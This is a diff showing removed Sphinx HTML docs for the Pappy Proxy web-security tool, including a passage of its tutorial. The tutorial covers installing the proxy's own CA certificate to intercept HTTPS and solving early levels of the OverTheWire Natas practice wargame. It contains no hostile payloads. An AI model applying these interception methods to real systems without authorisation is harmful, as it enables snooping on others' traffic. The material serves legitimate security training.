>modules</a> |</li>
<li class="right" >
<a href="contributing.html" title="Contributing"
>next</a> |</li>
<li class="right" >
<a href="tutorial.html" title="The Pappy Proxy Tutorial"
>previous</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

1936
docs/build/html/pappyproxy.html vendored
View File

File diff suppressed because it is too large Load Diff

174
docs/build/html/py-modindex.html vendored
Unescape View File

@ -1,174 +0,0 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Python Module Index &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
};
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
</head>
<body role="document">
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
accesskey="I">index</a></li>
<li class="right" >
<a href="#" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="document">
<div class="documentwrapper">
<div class="bodywrapper">
<div class="body" role="main">
<h1>Python Module Index</h1>
<div class="modindex-jumpbox">
<a href="#cap-p"><strong>p</strong></a>
</div>
<table class="indextable modindextable" cellspacing="0" cellpadding="2">
<tr class="pcap"><td></td><td>&nbsp;</td><td></td></tr>
<tr class="cap" id="cap-p"><td></td><td>
<strong>p</strong></td><td></td></tr>
<tr>
<td><img src="_static/minus.png" class="toggler"
id="toggle-1" style="display: none" alt="-" /></td>
<td>
<a href="pappyproxy.html#module-pappyproxy"><code class="xref">pappyproxy</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.comm"><code class="xref">pappyproxy.comm</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.config"><code class="xref">pappyproxy.config</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.console"><code class="xref">pappyproxy.console</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.context"><code class="xref">pappyproxy.context</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.http"><code class="xref">pappyproxy.http</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.iter"><code class="xref">pappyproxy.iter</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.macros"><code class="xref">pappyproxy.macros</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.pappy"><code class="xref">pappyproxy.pappy</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.plugin"><code class="xref">pappyproxy.plugin</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.proxy"><code class="xref">pappyproxy.proxy</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.repeater"><code class="xref">pappyproxy.repeater</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.session"><code class="xref">pappyproxy.session</code></a></td><td>
<em></em></td></tr>
<tr class="cg-1">
<td></td>
<td>&nbsp;&nbsp;&nbsp;
<a href="pappyproxy.html#module-pappyproxy.util"><code class="xref">pappyproxy.util</code></a></td><td>
<em></em></td></tr>
</table>
</div>
</div>
</div>
<div class="sphinxsidebar" role="navigation" aria-label="main navigation">
<div class="sphinxsidebarwrapper">
<div id="searchbox" style="display: none" role="search">
<h3>Quick search</h3>
<form class="search" action="search.html" method="get">
<input type="text" name="q" />
<input type="submit" value="Go" />
<input type="hidden" name="check_keywords" value="yes" />
<input type="hidden" name="area" value="default" />
</form>
<p class="searchtip" style="font-size: 90%">
Enter search terms or a module, class or function name.
</p>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
</div>
</div>
<div class="clearer"></div>
</div>
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
>index</a></li>
<li class="right" >
<a href="#" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

105
docs/build/html/search.html vendored
Unescape View File

@ -1,105 +0,0 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Search &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
};
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<script type="text/javascript" src="_static/searchtools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
<script type="text/javascript">
jQuery(function() { Search.loadIndex("searchindex.js"); });
</script>
<script type="text/javascript" id="searchindexloader"></script>
</head>
<body role="document">
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
accesskey="I">index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="document">
<div class="documentwrapper">
<div class="bodywrapper">
<div class="body" role="main">
<h1 id="search-documentation">Search</h1>
<div id="fallback" class="admonition warning">
<script type="text/javascript">$('#fallback').hide();</script>
<p>
Please activate JavaScript to enable the search
functionality.
</p>
</div>
<p>
From here you can search these documents. Enter your search
words into the box below and click "search". Note that the search
function will automatically search for all of the words. Pages
containing fewer words won't appear in the result list.
</p>
<form action="" method="get">
<input type="text" name="q" value="" />
<input type="submit" value="search" />
<span id="search-progress" style="padding-left: 10px"></span>
</form>
<div id="search-results">
</div>
</div>
</div>
</div>
<div class="sphinxsidebar" role="navigation" aria-label="main navigation">
<div class="sphinxsidebarwrapper">
</div>
</div>
<div class="clearer"></div>
</div>
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
>index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

1
docs/build/html/searchindex.js vendored
View File

File diff suppressed because one or more lines are too long

904
docs/build/html/tutorial.html vendored
Unescape View File

@ -1,904 +0,0 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>The Pappy Proxy Tutorial &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
};
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
<link rel="next" title="Writing Plugins for the Pappy Proxy" href="pappyplugins.html" />
<link rel="prev" title="The Pappy Proxy" href="overview.html" />
</head>
<body role="document">
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
accesskey="I">index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="right" >
<a href="pappyplugins.html" title="Writing Plugins for the Pappy Proxy"
accesskey="N">next</a> |</li>
<li class="right" >
<a href="overview.html" title="The Pappy Proxy"
accesskey="P">previous</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="document">
<div class="documentwrapper">
<div class="bodywrapper">
<div class="body" role="main">
<div class="section" id="the-pappy-proxy-tutorial">
<h1>The Pappy Proxy Tutorial<a class="headerlink" href="#the-pappy-proxy-tutorial" title="Permalink to this headline"></a></h1>
<div class="contents local topic" id="table-of-contents">
<p class="topic-title first">Table of Contents</p>
<ul class="simple">
<li><a class="reference internal" href="#getting-set-up" id="id1">Getting Set Up</a><ul>
<li><a class="reference internal" href="#introduction" id="id2">Introduction</a></li>
<li><a class="reference internal" href="#getting-started" id="id3">Getting Started</a></li>
<li><a class="reference internal" href="#installing-pappy-s-ca-cert" id="id4">Installing Pappy&#8217;s CA Cert</a><ul>
<li><a class="reference internal" href="#installing-the-cert-in-firefox" id="id5">Installing the Cert in Firefox</a></li>
<li><a class="reference internal" href="#installing-the-cert-in-chrome" id="id6">Installing the Cert in Chrome</a></li>
<li><a class="reference internal" href="#installing-the-cert-in-safari" id="id7">Installing the Cert in Safari</a></li>
<li><a class="reference internal" href="#installing-the-cert-in-internet-explorer" id="id8">Installing the Cert in Internet Explorer</a></li>
</ul>
</li>
<li><a class="reference internal" href="#configuring-your-browser" id="id9">Configuring Your Browser</a></li>
<li><a class="reference internal" href="#testing-it-out" id="id10">Testing it Out</a></li>
</ul>
</li>
<li><a class="reference internal" href="#the-tutorial" id="id11">The Tutorial</a><ul>
<li><a class="reference internal" href="#setting-the-scope" id="id12">Setting the Scope</a></li>
<li><a class="reference internal" href="#natas-0" id="id13">Natas 0</a></li>
<li><a class="reference internal" href="#natas-1" id="id14">Natas 1</a></li>
<li><a class="reference internal" href="#natas-2" id="id15">Natas 2</a></li>
<li><a class="reference internal" href="#natas-3" id="id16">Natas 3</a></li>
<li><a class="reference internal" href="#finding-your-passwords-later-how-to-use-filters" id="id17">Finding Your Passwords Later (How to Use Filters)</a><ul>
<li><a class="reference internal" href="#filters" id="id18">Filters</a></li>
<li><a class="reference internal" href="#finding-passwords" id="id19">Finding Passwords</a></li>
</ul>
</li>
<li><a class="reference internal" href="#natas-4" id="id20">Natas 4</a></li>
<li><a class="reference internal" href="#natas-5" id="id21">Natas 5</a></li>
<li><a class="reference internal" href="#natas-6" id="id22">Natas 6</a></li>
<li><a class="reference internal" href="#natas-7" id="id23">Natas 7</a></li>
<li><a class="reference internal" href="#natas-8" id="id24">Natas 8</a></li>
<li><a class="reference internal" href="#natas-9" id="id25">Natas 9</a></li>
<li><a class="reference internal" href="#skip-a-few-natas-15" id="id26">Skip a few... Natas 15</a></li>
</ul>
</li>
<li><a class="reference internal" href="#conclusion" id="id27">Conclusion</a></li>
</ul>
</div>
<div class="section" id="getting-set-up">
<h2><a class="toc-backref" href="#id1">Getting Set Up</a><a class="headerlink" href="#getting-set-up" title="Permalink to this headline"></a></h2>
<div class="section" id="introduction">
<h3><a class="toc-backref" href="#id2">Introduction</a><a class="headerlink" href="#introduction" title="Permalink to this headline"></a></h3>
<p>This is a quick tutorial to get you started using Pappy like a pro. To do this, we&#8217;ll be going through from <a class="reference external" href="http://overthewire.org/wargames/natas/">Natas</a>. If you haven&#8217;t done it yet and don&#8217;t want it spoiled, I suggest giving it a try with Burp since we&#8217;ll be telling you all the answers right off the bat.</p>
</div>
<div class="section" id="getting-started">
<h3><a class="toc-backref" href="#id3">Getting Started</a><a class="headerlink" href="#getting-started" title="Permalink to this headline"></a></h3>
<p>The first thing you&#8217;ll need to do is get Pappy installed.</p>
<p>Install from pypi:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pip install pappy
</pre></div>
</div>
<p>or install from source:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>$ git clone --recursive https://github.com/roglew/pappy-proxy.git
$ cd pappy-proxy
$ pip install .
</pre></div>
</div>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">Pappy only supports OS X and Linux! Nothing will work on Windows, sorry!</p>
</div>
<p>That was easy! Make a project directory anywhere for Natas and fire up Pappy.:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>$ mkdir natas
$ cd natas
Copying default config to ./config.json
Proxy is listening on port 8000
pappy&gt;
</pre></div>
</div>
<p>If you look at what&#8217;s in the directory, you&#8217;ll notice that there&#8217;s a <code class="docutils literal"><span class="pre">data.db</span></code> file and a <code class="docutils literal"><span class="pre">config.json</span></code> file.</p>
<ul class="simple">
<li><code class="docutils literal"><span class="pre">data.db</span></code> is a SQLite file that stores all the (in-scope) requests that pass through the proxy</li>
<li><code class="docutils literal"><span class="pre">config.json</span></code> stores settings for the proxy</li>
</ul>
<p>You don&#8217;t need to touch either of these right now. Just hop back into Pappy.</p>
</div>
<div class="section" id="installing-pappy-s-ca-cert">
<h3><a class="toc-backref" href="#id4">Installing Pappy&#8217;s CA Cert</a><a class="headerlink" href="#installing-pappy-s-ca-cert" title="Permalink to this headline"></a></h3>
<p>In order to intercept HTTPS requests, you&#8217;ll need to add a CA cert to your browser. Installing the cert allows Pappy to act like a certificate authority and sign certificates for whatever it wants without your browser complaining.</p>
<p>To generate certificates, you&#8217;ll use the <code class="docutils literal"><span class="pre">gencerts</span></code> command. This will generate certificates in Pappy&#8217;s directory. By default, all projects will use the certs in this directory, so you should only have to generate/install the certificates once.:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; gencerts
This will overwrite any existing certs in /home/anonymouse/pappy/pappyproxy/certs. Are you sure?
(y/N) y
Generating certs to /home/anonymouse/pappy/pappyproxy/certs
Generating private key... Done!
Generating client cert... Done!
pappy&gt;
</pre></div>
</div>
<p>The directory that the certs get put in may be different for you. Next, you&#8217;ll need to add the generated <code class="docutils literal"><span class="pre">certificate.crt</span></code> file to your browser. This is different for each browser.</p>
<div class="section" id="installing-the-cert-in-firefox">
<h4><a class="toc-backref" href="#id5">Installing the Cert in Firefox</a><a class="headerlink" href="#installing-the-cert-in-firefox" title="Permalink to this headline"></a></h4>
<ol class="arabic simple">
<li>Open Firefox</li>
<li>Go to <code class="docutils literal"><span class="pre">Preferences</span> <span class="pre">-&gt;</span> <span class="pre">Advanced</span> <span class="pre">-&gt;</span> <span class="pre">View</span> <span class="pre">Certificates</span> <span class="pre">-&gt;</span> <span class="pre">Authorities</span></code></li>
<li>Click <code class="docutils literal"><span class="pre">Import</span></code></li>
<li>Navigate to the directory where the certs were generated and double click <code class="docutils literal"><span class="pre">certificate.crt</span></code></li>
</ol>
</div>
<div class="section" id="installing-the-cert-in-chrome">
<h4><a class="toc-backref" href="#id6">Installing the Cert in Chrome</a><a class="headerlink" href="#installing-the-cert-in-chrome" title="Permalink to this headline"></a></h4>
<ol class="arabic simple">
<li>Open Chrome</li>
<li>Go to <code class="docutils literal"><span class="pre">Preferences</span> <span class="pre">-&gt;</span> <span class="pre">Show</span> <span class="pre">advanced</span> <span class="pre">settings</span> <span class="pre">-&gt;</span> <span class="pre">HTTPS/SSL</span> <span class="pre">-&gt;</span> <span class="pre">Manage</span> <span class="pre">Certificates</span> <span class="pre">-&gt;</span> <span class="pre">Authorities</span></code></li>
<li>Click <code class="docutils literal"><span class="pre">Import</span></code></li>
<li>Navigate to the directory where the certs were generated and double click <code class="docutils literal"><span class="pre">certificate.crt</span></code></li>
</ol>
</div>
<div class="section" id="installing-the-cert-in-safari">
<h4><a class="toc-backref" href="#id7">Installing the Cert in Safari</a><a class="headerlink" href="#installing-the-cert-in-safari" title="Permalink to this headline"></a></h4>
<ol class="arabic simple">
<li>Use Finder to navigate to the directory where the certs were generated</li>
<li>Double click the cert and follow the prompts to add it to your system keychain</li>
</ol>
</div>
<div class="section" id="installing-the-cert-in-internet-explorer">
<h4><a class="toc-backref" href="#id8">Installing the Cert in Internet Explorer</a><a class="headerlink" href="#installing-the-cert-in-internet-explorer" title="Permalink to this headline"></a></h4>
<ol class="arabic simple">
<li>No.</li>
</ol>
</div>
</div>
<div class="section" id="configuring-your-browser">
<h3><a class="toc-backref" href="#id9">Configuring Your Browser</a><a class="headerlink" href="#configuring-your-browser" title="Permalink to this headline"></a></h3>
<p>Next, you need to configure your browser to use the proxy. This is generally done using a browser extension. This tutorial won&#8217;t cover how to configure these plugins. Pappy runs on localhost on port 8000. This can be changed in <code class="docutils literal"><span class="pre">config.json</span></code>, but don&#8217;t worry about that right now.</p>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">Configure your browser extension to use the proxy server at <strong>loalhost</strong> on <strong>port 8000</strong></p>
</div>
<p>Here are some proxy plugins that should work</p>
<ul class="simple">
<li>Firefox: <a class="reference external" href="https://addons.mozilla.org/en-us/firefox/addon/foxyproxy-standard/">FoxyProxy</a></li>
<li>Chrome: <a class="reference external" href="https://chrome.google.com/webstore/detail/proxy-switchysharp/dpplabbmogkhghncfbfdeeokoefdjegm?hl=en">Proxy SwitchySharp</a></li>
</ul>
</div>
<div class="section" id="testing-it-out">
<h3><a class="toc-backref" href="#id10">Testing it Out</a><a class="headerlink" href="#testing-it-out" title="Permalink to this headline"></a></h3>
<p>Start up Pappy in Lite mode by running <code class="docutils literal"><span class="pre">pappy</span> <span class="pre">-l</span></code>, enable the proxy in your browser, then navigate to a website:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>/pappynatas/ $ pappy -l
Temporary datafile is /tmp/tmp5AQBrH
Proxy is listening on port 8000
pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
8 GET vitaly.sexy /favicon.ico 404 Not Found 0 114 0.21 --
7 GET vitaly.sexy /favicon.ico 404 Not Found 0 114 0.22 --
6 GET vitaly.sexy /esr1.jpg 200 OK 0 17653 0.29 --
5 GET vitaly.sexy /netscape.gif 200 OK 0 1135 0.22 --
4 GET vitaly.sexy /construction.gif 200 OK 0 28366 0.26 --
3 GET vitaly.sexy /vitaly2.jpg 200 OK 0 2034003 1.34 --
2 GET vitaly.sexy / 200 OK 0 1201 0.21 --
1 GET vitaly.sexy / 301 Moved Permanently 0 178 0.27 --
pappy&gt; quit
Deleting temporary datafile
</pre></div>
</div>
<p>Make sure that the request you made appears on the list. When you quit, the temporary data file will be deleted, so no cleanup will be required!</p>
</div>
</div>
<div class="section" id="the-tutorial">
<h2><a class="toc-backref" href="#id11">The Tutorial</a><a class="headerlink" href="#the-tutorial" title="Permalink to this headline"></a></h2>
<div class="section" id="setting-the-scope">
<h3><a class="toc-backref" href="#id12">Setting the Scope</a><a class="headerlink" href="#setting-the-scope" title="Permalink to this headline"></a></h3>
<p>The first thing we&#8217;ll do is set up Pappy so that it only intercepts requests going to <code class="docutils literal"><span class="pre">*.natas.labs.overthewire.org</span></code>:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; filter host containsr &quot;natas\.labs\.overthewire\.org$&quot;
pappy&gt; scope_save
</pre></div>
</div>
<p>What these commands do:</p>
<ol class="arabic simple">
<li>Make the current context only include requests whose host ends in <code class="docutils literal"><span class="pre">natas.labs.overthewire.org</span></code>.</li>
<li>Save the current context as the scope</li>
</ol>
<p>The context is basically requests that pass a list of rules. In this case, we have one rule that says that in order for a request to be in the current context, it must pass the regexp <code class="docutils literal"><span class="pre">natas\.labs\.overthewire\.org$</span></code>. When we save the scope, we&#8217;re saying that any request that doesn&#8217;t pass this regexp is out of scope and shouldn&#8217;t be touched.</p>
<p>If this doesn&#8217;t make sense, don&#8217;t worry, we&#8217;ll come back to this.</p>
</div>
<div class="section" id="natas-0">
<h3><a class="toc-backref" href="#id13">Natas 0</a><a class="headerlink" href="#natas-0" title="Permalink to this headline"></a></h3>
<p>First, go to <a class="reference external" href="http://natas0.natas.labs.overthewire.org">http://natas0.natas.labs.overthewire.org</a> and log in with the default creds of <code class="docutils literal"><span class="pre">natas0</span></code> / <code class="docutils literal"><span class="pre">natas0</span></code>. You should see a site that says &#8220;You can find the password for the next level on this page&#8221;. You don&#8217;t need Pappy for this one.</p>
<ol class="arabic simple">
<li>Right click the page and select &#8220;view source&#8221;</li>
<li>Read the password for natas1</li>
<li>Visit <a class="reference external" href="http://natas1.natas.labs.overthewire.org">http://natas1.natas.labs.overthewire.org</a> and log in with the username <code class="docutils literal"><span class="pre">natas1</span></code> and the password you found.</li>
</ol>
</div>
<div class="section" id="natas-1">
<h3><a class="toc-backref" href="#id14">Natas 1</a><a class="headerlink" href="#natas-1" title="Permalink to this headline"></a></h3>
<p>Haha! This is the same as natas0, but they got tricky and shut off right-clicking. There&#8217;s still ways to view the source in the browser, but we&#8217;ll use Pappy here. The commands we&#8217;ll learn here are <code class="docutils literal"><span class="pre">ls</span></code>, <code class="docutils literal"><span class="pre">vfq</span></code>, and <code class="docutils literal"><span class="pre">vfs</span></code>.</p>
<ul class="simple">
<li><code class="docutils literal"><span class="pre">ls</span></code> lists the most current requests that are in the current context. You&#8217;ll be using this a lot to get the IDs of requests you want to do things with.</li>
<li><code class="docutils literal"><span class="pre">vfq</span> <span class="pre">&lt;reqid&gt;</span></code> prints the full request of a request you specify</li>
<li><code class="docutils literal"><span class="pre">vfs</span> <span class="pre">&lt;reqid&gt;</span></code> prints the full response to a request you specify</li>
</ul>
<p>So to solve natas1, we&#8217;ll want to view the full response to our request to the page:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
16 GET natas1.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
15 GET natas1.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
14 GET natas1.natas.labs.overthewire.org / 200 OK 0 1063 0.27 --
13 GET natas1.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
12 GET natas0.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
11 GET natas0.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.26 --
10 GET natas.labs.overthewire.org /img/wechall.gif 200 OK 0 9279 0.28 --
9 GET natas.labs.overthewire.org /js/wechall.js 200 OK 0 1074 0.50 --
8 GET natas.labs.overthewire.org /js/wechall-data.js 200 OK 0 564 0.48 --
7 GET natas.labs.overthewire.org /js/jquery-ui.js 200 OK 0 435844 1.37 --
6 GET natas.labs.overthewire.org /js/jquery-1.9.1.js 200 OK 0 268381 1.20 --
4 GET natas.labs.overthewire.org /css/wechall.css 200 OK 0 677 0.48 --
5 GET natas.labs.overthewire.org /css/jquery-ui.css 200 OK 0 32046 0.49 --
3 GET natas.labs.overthewire.org /css/level.css 200 OK 0 1332 0.48 --
2 GET natas0.natas.labs.overthewire.org / 200 OK 0 918 0.26 --
1 GET natas0.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
pappy&gt; vfs 14
HTTP/1.1 200 OK
Date: Fri, 18 Dec 2015 19:47:21 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 14 Nov 2014 10:32:33 GMT
ETag: &quot;427-507cf258a5240-gzip&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1063
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
... snip ...
&lt;!--The password for natas2 is [password] --&gt;
... snip ...
pappy&gt;
</pre></div>
</div>
<p>Yay!</p>
</div>
<div class="section" id="natas-2">
<h3><a class="toc-backref" href="#id15">Natas 2</a><a class="headerlink" href="#natas-2" title="Permalink to this headline"></a></h3>
<p>When you visit this page, you get a message saying &#8220;There is nothing on this page&#8221;. That is probably a blatant lie. Let&#8217;s see what was in that response.:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
30 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
29 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
28 GET natas2.natas.labs.overthewire.org /files/pixel.png 200 OK 0 303 0.27 --
27 GET natas2.natas.labs.overthewire.org / 200 OK 0 872 0.27 --
26 GET natas2.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
... snip ...
pappy&gt; vfs 27
HTTP/1.1 200 OK
... snip ...
&lt;body&gt;
&lt;h1&gt;natas2&lt;/h1&gt;
&lt;div id=&quot;content&quot;&gt;
There is nothing on this page
&lt;img src=&quot;files/pixel.png&quot;&gt;
&lt;/div&gt;
&lt;/body&gt;&lt;/html&gt;
pappy&gt;
</pre></div>
</div>
<p>So the only suspicious thing is <code class="docutils literal"><span class="pre">&lt;img</span> <span class="pre">src=&quot;files/pixel.png&quot;&gt;</span></code>. I&#8217;ll let you figure out the rest ;)</p>
</div>
<div class="section" id="natas-3">
<h3><a class="toc-backref" href="#id16">Natas 3</a><a class="headerlink" href="#natas-3" title="Permalink to this headline"></a></h3>
<p>This one doesn&#8217;t require Pappy. Just view the <code class="docutils literal"><span class="pre">robots.txt</span></code> file.</p>
</div>
<div class="section" id="finding-your-passwords-later-how-to-use-filters">
<h3><a class="toc-backref" href="#id17">Finding Your Passwords Later (How to Use Filters)</a><a class="headerlink" href="#finding-your-passwords-later-how-to-use-filters" title="Permalink to this headline"></a></h3>
<p>This section will explain how to use Pappy&#8217;s filters to find passwords to levels you&#8217;ve already completed. Every in-scope request and response that goes through Pappy is stored in the <code class="docutils literal"><span class="pre">data.db</span></code> file in your project directory. We can use filter commands to search through these requests to find resposes with passwords.</p>
<div class="section" id="filters">
<h4><a class="toc-backref" href="#id18">Filters</a><a class="headerlink" href="#filters" title="Permalink to this headline"></a></h4>
<p>Here are the commands we&#8217;ll learn:</p>
<ol class="arabic simple">
<li><code class="docutils literal"><span class="pre">filter</span> <span class="pre">&lt;filter</span> <span class="pre">string&gt;</span></code> / <code class="docutils literal"><span class="pre">f</span> <span class="pre">&lt;filter</span> <span class="pre">string&gt;</span></code> Add a filter that limits which requests are included in the current context</li>
<li><code class="docutils literal"><span class="pre">fu</span></code> Remove the most recently applied filter</li>
<li><code class="docutils literal"><span class="pre">sr</span></code> Reset the context so that it matches the scope</li>
<li><code class="docutils literal"><span class="pre">filter_clear</span></code> Remove all filters from the context, including the filters applied by the scope</li>
<li><code class="docutils literal"><span class="pre">fls</span></code> Show all currently applied filters</li>
</ol>
<p>The most complicated of these is the <code class="docutils literal"><span class="pre">filter</span></code> command since it takes a filter string as an argument. All a filter string is is a string that defines which requests will pass the filter. Anything that doesn&#8217;t pass the filter will be removed from the context. Most filter strings are of the format <code class="docutils literal"><span class="pre">&lt;field&gt;</span> <span class="pre">&lt;comparer&gt;</span> <span class="pre">&lt;value&gt;</span></code>. For example:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="n">host</span> <span class="ow">is</span> <span class="n">www</span><span class="o">.</span><span class="n">target</span><span class="o">.</span><span class="n">org</span>
<span class="n">field</span> <span class="o">=</span> <span class="s2">&quot;host&quot;</span>
<span class="n">comparer</span> <span class="o">=</span> <span class="s2">&quot;is&quot;</span>
